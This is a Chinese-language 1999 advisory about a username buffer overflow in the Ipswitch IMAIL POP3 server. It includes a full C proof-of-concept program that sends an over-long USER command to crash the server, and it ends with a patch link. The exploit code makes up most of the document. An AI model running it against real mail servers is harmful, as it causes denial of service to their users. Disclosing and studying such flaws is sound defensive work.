Ipswitch's IMAIL POP3 server漏洞

作者:Interrupt (mike@eeye.com)
主页:http://www.ipswitch.com
日期:1999-11-15


  ◆Ipswitch's IMAIL POP3 server漏洞

发现者:Interrupt (mike@eeye.com)

由于 Ipswitch 的 IMAIL POP3 服务器没有对用户名做恰当的边界检查,当客户端发送一个很长的用户名时(通过 "USER <200-500个字符>" 命令),服务器就会触发该漏洞。

5.07、5.06、5.05 版均存在此问题。它可能引发拒绝服务;是否能造成更严重的危害尚未验证。

Exploit (by Interrupt):

/*
  * IMAIL 5.07 POP3 Overflow
  * By: Mike@eEye.com
  *
  * Demonstrates vulnerability
  */

  #include
  #include

#ifdef WINDOWS
  #include
  #include
#else
  #include
  #include
  #include
  #include
#endif

#ifndef WINDOWS
  #define SOCKET_ERROR -1
  #define closesocket(sock) close(sock)
  #define WSACleanup() ;
#endif

/*
 * The POP3 USER command padded with a few hundred filler bytes and a
 * trailing newline.  Per the advisory above, the server copies the
 * username without a length check, so an over-long value overruns its
 * buffer.  The filler is plain 'A' bytes and carries no code, which is
 * consistent with the advisory reporting only a denial of service.
 */
char overflow[] =
  "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";

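/*
 * Print `msg`, release the socket (and on Windows the WinSock library),
 * and exit.  Every failure after the socket exists funnels through here
 * so that no path leaves the descriptor open.  The exit status is -1 on
 * all of them; the original used 1 for a recv() failure only, which was
 * an inconsistency rather than a deliberate distinction.
 */
static void fail_closing(int sockfd, const char *msg)
{
    printf("%s", msg);
    closesocket(sockfd);
    WSACleanup();
    exit(-1);
}

/*
 * Connects to the target POP3 service, waits for the server greeting,
 * and sends the over-long USER line held in `overflow`.
 *
 * argv[1] is the host name or address; argv[2] is an optional port,
 * defaulting to 110.  Prints usage and exits 0 when no host is given;
 * on any lookup, socket, connect, recv or send failure prints a message
 * and exits -1.  Returns 0 once the line has been sent.
 *
 * NOTE(review): the `#include` lines above lost their header names when
 * the page was extracted; the names used here need <stdio.h>,
 * <stdlib.h>, <string.h> and the platform socket headers -- confirm
 * against the original source before building.
 */
int main(int argc, char *argv[])
{
#ifdef WINDOWS
    WSADATA wsaData;
#endif
    struct hostent *hp;
    struct sockaddr_in sockin;
    char buf[300];
    int sockfd, bytes;
    const char *hostname;
    unsigned short port;

    if (argc <= 1) {
        printf("IMAIL POP3 Overflow\n");
        printf("By: Mike@eEye.com\n\n");
        printf("Usage: %s [hostname] [port]\n", argv[0]);
        printf("If port is not specified we use '110'\n");
        exit(0);
    }

    hostname = argv[1];
    /* argv[argc] is NULL, so test argc instead of relying on argv[2]. */
    port = (argc > 2) ? (unsigned short)atoi(argv[2]) : 110;

    printf("IMAIL POP3 Overflow\n");
    printf("By: Mike@eEye.com\n\n");

#ifdef WINDOWS
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) {
        fprintf(stderr, "Error setting up with WinSock v1.1\n");
        exit(-1);
    }
#endif

    hp = gethostbyname(hostname);
    if (hp == NULL) {
        printf("ERROR: Uknown host %s\n", hostname);
        exit(-1);
    }

    /* Zero the whole struct so the padding bytes are not left uninitialized. */
    memset(&sockin, 0, sizeof sockin);
    sockin.sin_family = hp->h_addrtype;
    sockin.sin_port = htons(port);
    /* memcpy instead of casting h_addr (a char *) to struct in_addr *. */
    memcpy(&sockin.sin_addr, hp->h_addr, sizeof sockin.sin_addr);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) {
        printf("ERROR: Socket Error\n");
        exit(-1);
    }

    if (connect(sockfd, (struct sockaddr *)&sockin, sizeof sockin) == SOCKET_ERROR) {
        fail_closing(sockfd, "ERROR: Connect Error\n");
    }

    printf("Connected to [%s] on port [%d], sending overflow....\n",
           hostname, port);

    /*
     * Read the greeting.  Leave one byte of `buf` for the terminator:
     * the original asked recv() for all 300 bytes and then wrote
     * buf[bytes], which is one past the end on a full read -- the same
     * missing-bound-check bug class the advisory describes, in the
     * client.  A zero-length read means the peer closed the connection
     * and is treated as a failure rather than as an empty greeting.
     */
    bytes = recv(sockfd, buf, sizeof buf - 1, 0);
    if (bytes == SOCKET_ERROR) {
        fail_closing(sockfd, "ERROR: Recv Error\n");
    }
    if (bytes == 0) {
        fail_closing(sockfd, "ERROR: Connection closed before greeting\n");
    }
    buf[bytes] = '\0';

    /* Proceed only if the greeting carries the POP3 +OK status. */
    if (strstr(buf, "+OK") == NULL) {
        fail_closing(sockfd, "ERROR: NO +OK response from inital connect\n");
    }

    if (send(sockfd, overflow, strlen(overflow), 0) == SOCKET_ERROR) {
        fail_closing(sockfd, "ERROR: Send Error\n");
    }

    printf("Sent.\n");

    closesocket(sockfd);
    WSACleanup();
    return 0;
}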

补丁:

下载最新版软件:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe


